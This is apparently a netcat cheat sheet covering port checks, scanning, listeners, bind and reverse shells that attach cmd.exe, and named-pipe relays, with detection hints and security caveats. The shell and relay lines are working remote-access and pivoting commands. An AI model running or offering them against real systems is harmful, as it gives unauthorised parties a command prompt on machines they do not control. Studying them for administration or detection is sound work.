# netcat (nc) quick reference. Lowercase ip/port and [bracketed] names are
# placeholders to fill in, not literal arguments.
# NOTE(review): "-l -p PORT" and "-e" are traditional-netcat syntax; some
# builds (e.g. OpenBSD nc) take the listen port positionally and have no -e.
#
# Connect to one specific port; -v reports whether the connection succeeded
nc -v ip port
# Scan the range port1..port2; -z probes each port without sending any data
nc -v -z ip port1-port2
# Listen on a local port
nc -l -p port
# Listen on a local port and print connection details (-v)
nc -l -v -p port
# Connect to a host; -n skips DNS lookups, -vv is extra verbose
nc -nvv ip port
#
# --- Shell over nc, listener on the remote host (bind shell) ---
# -e attaches the named program to the socket. nc adds no authentication or
# encryption, so anyone who can reach the listening port gets a command prompt
# with the privileges of the nc process, and the whole session is plaintext.
# Detection: nc started with -e, cmd.exe running as a child of nc, or an
# unexpected listening port owned by nc.
# Local host: connect to the remote listener
nc -nvv [remote ip] [port]
# Remote host: listen and attach cmd.exe to the connection
# (-t answers telnet negotiation on builds that support it)
nc -l -p port -t -e c:\\windows\\system32\\cmd.exe
#
# --- Shell over nc, listener receives the connection (reverse shell) ---
# NOTE(review): the remote/local labels below swap roles compared with the
# pair above (here the listener is called "remote host") - confirm which
# perspective the author intended.
# Detection: an outbound connection from a host whose nc has cmd.exe as a child.
# Remote host: listen (very verbose) and wait for the incoming connection
nc -l -vv -p port
# Local host: connect out to ip:port and attach cmd.exe to that connection
nc -t -e c:\\windows\\system32\\cmd.exe ip port
#
# --- Relays: bridge two nc endpoints through a named pipe ---
# In each relay the first nc reads its stdin from the FIFO (0<backpipe) and
# pipes its output into the second nc; tee writes the second nc's output back
# into the FIFO and also echoes that direction of the traffic to the terminal.
# Data is forwarded as-is with no authentication, and the far endpoint sees the
# relay host as the connection source, so tracing a session means correlating
# both legs.
# Create the FIFO "backpipe" in the current directory (equivalent to
# "mkfifo backpipe"); it stays on disk after nc exits until it is removed.
mknod backpipe p
# listener2client: accept on [localport], forward to [target ip]:[port]
nc -l -p [localport] 0<backpipe |
nc [target ip] [port] |
tee backpipe
# listener2listener: listen on both ports and bridge whoever connects to each
nc -l -p [localport] 0<backpipe |
nc -l -p [localport2] |
tee backpipe
# client2client: connect out to both endpoints and bridge them
nc [ip1] [port1] 0<backpipe |
nc [ip2] [port2] |
tee backpipe